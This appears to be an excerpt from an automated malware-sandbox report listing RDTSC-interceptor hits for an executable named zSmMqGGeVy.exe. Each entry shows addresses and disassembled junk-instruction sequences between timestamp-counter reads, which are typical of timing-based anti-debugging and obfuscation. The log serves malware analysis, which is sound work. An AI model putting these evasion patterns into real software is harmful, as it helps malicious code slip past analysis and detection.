Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22552 second address: A22580 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F9DF4F3601Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9DF4F36025h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22580 second address: A22588 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2284B second address: A22851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2303B second address: A23041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A23E07 second address: A23E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A23E0D second address: A23E17 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9DF58A6BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A29CBA second address: A29CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9DF4F36016h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F9DF4F3601Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A29CD0 second address: A29CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2CA9A second address: A2CAFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9DF4F3601Dh 0x0000000b jmp 00007F9DF4F36026h 0x00000010 popad 0x00000011 pushad 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F9DF4F3601Ch 0x0000001a pop ebx 0x0000001b jmp 00007F9DF4F3601Ch 0x00000020 jmp 00007F9DF4F36029h 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A36F6A second address: A36F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35698 second address: A356B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF4F36025h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A356B1 second address: A356DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9DF58A6BD6h 0x00000008 jmp 00007F9DF58A6BE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007F9DF58A6BD6h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A356DE second address: A356E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35852 second address: A3585C instructions: 0x00000000 rdtsc 0x00000002 je 00007F9DF58A6BE2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35CDD second address: A35CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35CE1 second address: A35CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e je 00007F9DF58A6BD6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35CF8 second address: A35D22 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9DF4F3601Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F9DF4F36016h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9DF4F36028h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35E94 second address: A35E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9DF58A6BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35E9E second address: A35EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007F9DF4F36016h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35EB0 second address: A35ED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F9DF58A6BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F9DF58A6BDAh 0x00000012 jnc 00007F9DF58A6BD6h 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35ED1 second address: A35ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A36D6A second address: A36D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE5h 0x00000007 jmp 00007F9DF58A6BE6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A36D99 second address: A36DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F9DF4F36022h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007F9DF4F3602Dh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A36DD6 second address: A36DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9DF58A6BD6h 0x0000000a popad 0x0000000b push edi 0x0000000c jmp 00007F9DF58A6BE7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A34BB7 second address: A34BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A34BC0 second address: A34BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9DF58A6BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C793 second address: A3C799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C799 second address: A3C79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C79D second address: A3C7A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C7A1 second address: A3C7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C1DF second address: A3C202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9DF4F36023h 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F9DF4F36016h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C35C second address: A3C36C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A499B9 second address: A499BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A4AFF4 second address: A4B003 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jno 00007F9DF58A6BD6h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A4B003 second address: A4B015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A4B015 second address: A4B03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F9DF58A6BD6h 0x0000000c popad 0x0000000d jmp 00007F9DF58A6BE8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A4B03A second address: A4B046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5181E second address: A51822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A51822 second address: A5182D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5182D second address: A51852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9DF58A6BD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F9DF58A6BD6h 0x00000014 jmp 00007F9DF58A6BDFh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A51852 second address: A51857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A51857 second address: A51868 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 je 00007F9DF58A6BD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A51868 second address: A5186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5186E second address: A51874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5C09C second address: A5C0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5C0A0 second address: A5C0A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5C0A5 second address: A5C0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007F9DF4F3601Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A62BEB second address: A62BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a ja 00007F9DF58A6BD6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A62BFD second address: A62C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F9DF4F36016h 0x0000000c popad 0x0000000d pop ecx 0x0000000e push esi 0x0000000f jc 00007F9DF4F3601Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A69F44 second address: A69F5E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9DF58A6BE5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68A3D second address: A68A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68A41 second address: A68A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68D24 second address: A68D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68D2A second address: A68D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68D31 second address: A68D5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Ah 0x00000007 js 00007F9DF4F3602Ch 0x0000000d jmp 00007F9DF4F36024h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68D5F second address: A68D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68E86 second address: A68E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A6914A second address: A6914E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A69C5A second address: A69C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9DF4F36016h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A69C68 second address: A69C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE1h 0x00000009 jmp 00007F9DF58A6BE7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A6DB8E second address: A6DB96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A87DAA second address: A87DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A87DB0 second address: A87DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 98171D second address: 981721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8E83E second address: A8E844 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D703 second address: A8D707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D707 second address: A8D73D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jnc 00007F9DF4F36016h 0x00000011 jbe 00007F9DF4F36016h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jnc 00007F9DF4F36016h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D892 second address: A8D898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D898 second address: A8D89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D89F second address: A8D8C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF58A6BE3h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F9DF58A6BDCh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D8C8 second address: A8D8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A9015F second address: A90163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A92B44 second address: A92B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A92B48 second address: A92B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A930EA second address: A9311B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F9DF4F36016h 0x00000009 jbe 00007F9DF4F36016h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 sub dword ptr [ebp+122D3A1Eh], ecx 0x0000001b push dword ptr [ebp+122D2B8Eh] 0x00000021 and edx, dword ptr [ebp+122D33D0h] 0x00000027 push 45B2E513h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A9311B second address: A93120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A97C76 second address: A97C99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F9DF4F36025h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F9DF4F3601Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A97C99 second address: A97C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A97C9D second address: A97CA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A97CA2 second address: A97CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D9046A second address: 4D90482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9DF4F36024h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D90482 second address: 4D90486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D90486 second address: 4D904AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F9DF4F36029h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D904AE second address: 4D904B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D904B5 second address: 4D904D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9DF4F36024h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D90370 second address: 4D903A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF58A6BE5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40E46 second address: 4D40E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40EFC second address: 4D40F0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F0B second address: 4D40F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop eax 0x00000011 pushfd 0x00000012 jmp 00007F9DF4F3601Fh 0x00000017 add ax, 359Eh 0x0000001c jmp 00007F9DF4F36029h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F60 second address: 4D40F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F66 second address: 4D40F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40F6A second address: 4D40F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF58A6BE2h 0x00000012 rdtsc
